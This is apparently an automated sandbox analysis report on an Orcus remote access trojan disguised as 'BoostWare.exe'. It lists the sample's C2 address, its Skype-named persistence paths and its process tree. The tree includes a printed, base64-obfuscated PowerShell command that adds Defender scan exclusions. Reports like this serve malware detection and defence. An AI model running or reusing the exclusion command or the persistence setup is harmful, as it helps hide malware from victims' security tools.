Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/02/2025, 18:36

General

  • Target

    BoostWare.exe

  • Size

    9.6MB

  • MD5

    1dc82cdf4c25c697678c3d95e12c494a

  • SHA1

    7e52934ffb36810cc3ed9974e7f650a9f2e1ba2e

  • SHA256

    5cf6ff4162d3eb61d3877ca0f2ab3174b95e210a8424134d4bc8698ba33e0ff3

  • SHA512

    5531feda823aa5d73f3538b22731dd54b93e15da9ce4f3e52ec380e99b52dcb7ad269fd532784a92b76deb8c2365cc190b8f784c18af7f4115612df01272ac2c

  • SSDEEP

    196608:XDPBJeZiU597HSECgB3Io5kG8s/CjAWmRYsDb7dXkDoJNrEiKkQQCncv:XFQZig97y0B375GIC0Qs8ovrEXcv

Malware Config

Extracted

Family

orcus

Botnet

Fortnite

C2

82.9.246.24:8808

Mutex

f65beca88ddb49089d3a6be2931bc598

Attributes
  • autostart_method

    Registry

  • enable_keylogger

    false

  • install_path

    %programfiles%\Microsoft\Skype.exe

  • reconnect_delay

    10000

  • registry_keyname

    Skype

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\Skype.exe

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Orcurs Rat Executable 2 IoCs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Drops file in System32 directory 3 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\BoostWare.exe
    "C:\Users\Admin\AppData\Local\Temp\BoostWare.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbAByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAagBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAdQBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAZABrACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4840
    • C:\Users\Admin\AppData\Local\Temp\Beta.exe
      "C:\Users\Admin\AppData\Local\Temp\Beta.exe"
      2⤵
      • Executes dropped EXE
      PID:2316
    • C:\Users\Admin\AppData\Local\Temp\Rha4t.exe
      "C:\Users\Admin\AppData\Local\Temp\Rha4t.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:412
      • C:\Windows\SysWOW64\WindowsInput.exe
        "C:\Windows\SysWOW64\WindowsInput.exe" --install
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        PID:2384
      • C:\Program Files\Microsoft\Skype.exe
        "C:\Program Files\Microsoft\Skype.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3516
        • C:\Users\Admin\AppData\Roaming\Skype.exe
          "C:\Users\Admin\AppData\Roaming\Skype.exe" /launchSelfAndExit "C:\Program Files\Microsoft\Skype.exe" 3516 /protectFile
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Users\Admin\AppData\Roaming\Skype.exe
            "C:\Users\Admin\AppData\Roaming\Skype.exe" /watchProcess "C:\Program Files\Microsoft\Skype.exe" 3516 "/protectFile"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2476
  • C:\Windows\SysWOW64\WindowsInput.exe
    "C:\Windows\SysWOW64\WindowsInput.exe"
    1⤵
    • Executes dropped EXE
    PID:2104
  • C:\Program Files\Microsoft\Skype.exe
    "C:\Program Files\Microsoft\Skype.exe"
    1⤵
    • Executes dropped EXE
    PID:1948

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Skype.exe.log

    Filesize

    425B

    MD5

    4eaca4566b22b01cd3bc115b9b0b2196

    SHA1

    e743e0792c19f71740416e7b3c061d9f1336bf94

    SHA256

    34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

    SHA512

    bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

  • C:\Users\Admin\AppData\Local\Temp\Beta.exe

    Filesize

    6.7MB

    MD5

    e7537ce869ffa596c293e451f3c8f726

    SHA1

    8873228a10fef6b3a5b05c9e2e447a1985841bcf

    SHA256

    4d135ec8daf850061742ddd4d49155e6b57599af896deb056dd68d26a8d0c13f

    SHA512

    3956b1cd36bf8fb73b411cba07d0c0e84e3e84b85d2d8234b65648a6826c11441d0963c04558831fbd5dc9e6fe04752557d6e0720afbe34c73e16b19f1eab561

  • C:\Users\Admin\AppData\Local\Temp\Rha4t.exe

    Filesize

    3.0MB

    MD5

    4676c622444293d23fc92c88b4d5de1f

    SHA1

    2a99665bd67956a8a55b0992ce736a55558f308e

    SHA256

    3023628d4215c3441486912e46694f64ff34636e9513456f162f3c1fa0c03847

    SHA512

    fb4b258db7d1b3962576d56af57a13962a8acff1233a58679c4286c2669a3e07888df24d9c28d9ab2fb8f5c3be4b3d51eedf7f0009de4bc02a52519f06af6990

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsc5v4pn.abo.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Skype.exe

    Filesize

    9KB

    MD5

    8ace06702ec59d170ca2b31f95812e0f

    SHA1

    de36712adf9b67d0b4c99d12eb59361adfc5473f

    SHA256

    f74d37fae8e3fb82eff8d6acf755687d9fb38403c38512ad794f16d5b471ce45

    SHA512

    5d4dc9ad439f66a17f286800559f1ad13f798cf633eaa7319f41691f2d11a519cccab568e0dd2cadebe4258f51d760fab9ca67e7ecb6c97ff496c9308de6cec5

  • C:\Users\Admin\AppData\Roaming\Skype.exe.config

    Filesize

    159B

    MD5

    740dde6369b1c855ea2f8e171fa888c8

    SHA1

    db3f1c7e5e4c087cf9eb02376fd750f1879f28f8

    SHA256

    e03c480b46464159387618445ca9fd9870b53e092e2278837f2d5a54daf06cae

    SHA512

    114607dcee4439e5e5c97ca986a65c8114a0e3f3c56f494ef6eaac9cb0f9ebf29b828aabc3100e4be197c94d54a7c26513942c56806bfb3bb0d3594ffef7458c

  • C:\Windows\SysWOW64\WindowsInput.exe

    Filesize

    21KB

    MD5

    a80be96476032d2eaa901d180fe9fb73

    SHA1

    f378d0bc5fefb9ea0b5006f020091ffcbcd7acec

    SHA256

    d6075c1ed6f285f5de01ce0cc6a817b59054da8b19f20bc7081cfe7fb2b1af42

    SHA512

    210c0c4c845b416a601015fba5ccd2a3e8a4b81d3b4c5e0491b07bd0dcad938d9b118728bb1abc21eb73c5f9263a3c08e1822ece91002a2d1f0983857f0192ea

  • C:\Windows\SysWOW64\WindowsInput.exe.config

    Filesize

    357B

    MD5

    a2b76cea3a59fa9af5ea21ff68139c98

    SHA1

    35d76475e6a54c168f536e30206578babff58274

    SHA256

    f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

    SHA512

    b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

  • memory/412-24-0x000002964A390000-0x000002964A3A0000-memory.dmp

    Filesize

    64KB

  • memory/412-23-0x000002962F8E0000-0x000002962FBDC000-memory.dmp

    Filesize

    3.0MB

  • memory/412-27-0x000002962FF70000-0x000002962FF7E000-memory.dmp

    Filesize

    56KB

  • memory/412-28-0x000002962FFB0000-0x000002962FFC2000-memory.dmp

    Filesize

    72KB

  • memory/412-26-0x0000029631840000-0x000002963189C000-memory.dmp

    Filesize

    368KB

  • memory/412-19-0x00007FFAA8C73000-0x00007FFAA8C75000-memory.dmp

    Filesize

    8KB

  • memory/1724-99-0x0000000000D70000-0x0000000000D78000-memory.dmp

    Filesize

    32KB

  • memory/2104-63-0x00000196D9690000-0x00000196D979A000-memory.dmp

    Filesize

    1.0MB

  • memory/2384-42-0x000001AB4B3B0000-0x000001AB4B3BC000-memory.dmp

    Filesize

    48KB

  • memory/2384-44-0x000001AB668C0000-0x000001AB668FC000-memory.dmp

    Filesize

    240KB

  • memory/2384-43-0x000001AB4B780000-0x000001AB4B792000-memory.dmp

    Filesize

    72KB

  • memory/3516-130-0x0000014540730000-0x00000145408F2000-memory.dmp

    Filesize

    1.8MB

  • memory/3516-132-0x0000014540290000-0x00000145402A6000-memory.dmp

    Filesize

    88KB

  • memory/3516-85-0x000001453F8F0000-0x000001453F900000-memory.dmp

    Filesize

    64KB

  • memory/3516-84-0x000001453F8D0000-0x000001453F8E8000-memory.dmp

    Filesize

    96KB

  • memory/3516-81-0x0000014526E50000-0x0000014526E62000-memory.dmp

    Filesize

    72KB

  • memory/3516-133-0x00000145402C0000-0x00000145402CC000-memory.dmp

    Filesize

    48KB

  • memory/3516-82-0x000001453FB10000-0x000001453FB68000-memory.dmp

    Filesize

    352KB

  • memory/4840-67-0x0000000006900000-0x000000000691E000-memory.dmp

    Filesize

    120KB

  • memory/4840-68-0x0000000006930000-0x000000000697C000-memory.dmp

    Filesize

    304KB

  • memory/4840-62-0x00000000063B0000-0x0000000006704000-memory.dmp

    Filesize

    3.3MB

  • memory/4840-52-0x0000000006340000-0x00000000063A6000-memory.dmp

    Filesize

    408KB

  • memory/4840-51-0x0000000006260000-0x00000000062C6000-memory.dmp

    Filesize

    408KB

  • memory/4840-49-0x00000000061A0000-0x00000000061C2000-memory.dmp

    Filesize

    136KB

  • memory/4840-45-0x0000000005AC0000-0x00000000060E8000-memory.dmp

    Filesize

    6.2MB

  • memory/4840-100-0x00000000078D0000-0x0000000007902000-memory.dmp

    Filesize

    200KB

  • memory/4840-101-0x0000000070680000-0x00000000706CC000-memory.dmp

    Filesize

    304KB

  • memory/4840-111-0x0000000006F00000-0x0000000006F1E000-memory.dmp

    Filesize

    120KB

  • memory/4840-112-0x0000000007B20000-0x0000000007BC3000-memory.dmp

    Filesize

    652KB

  • memory/4840-20-0x0000000005350000-0x0000000005386000-memory.dmp

    Filesize

    216KB

  • memory/4840-118-0x0000000008310000-0x000000000898A000-memory.dmp

    Filesize

    6.5MB

  • memory/4840-119-0x0000000007C60000-0x0000000007C7A000-memory.dmp

    Filesize

    104KB

  • memory/4840-120-0x0000000007CE0000-0x0000000007CEA000-memory.dmp

    Filesize

    40KB

  • memory/4840-121-0x0000000007F00000-0x0000000007F96000-memory.dmp

    Filesize

    600KB

  • memory/4840-122-0x0000000007E70000-0x0000000007E81000-memory.dmp

    Filesize

    68KB

  • memory/4840-123-0x000000007350E000-0x000000007350F000-memory.dmp

    Filesize

    4KB

  • memory/4840-124-0x0000000007EB0000-0x0000000007EBE000-memory.dmp

    Filesize

    56KB

  • memory/4840-125-0x0000000007EC0000-0x0000000007ED4000-memory.dmp

    Filesize

    80KB

  • memory/4840-126-0x0000000007FA0000-0x0000000007FBA000-memory.dmp

    Filesize

    104KB

  • memory/4840-127-0x0000000007EF0000-0x0000000007EF8000-memory.dmp

    Filesize

    32KB

  • memory/4840-25-0x0000000005480000-0x0000000005490000-memory.dmp

    Filesize

    64KB

  • memory/4840-22-0x0000000005480000-0x0000000005490000-memory.dmp

    Filesize

    64KB

  • memory/4840-15-0x000000007350E000-0x000000007350F000-memory.dmp

    Filesize

    4KB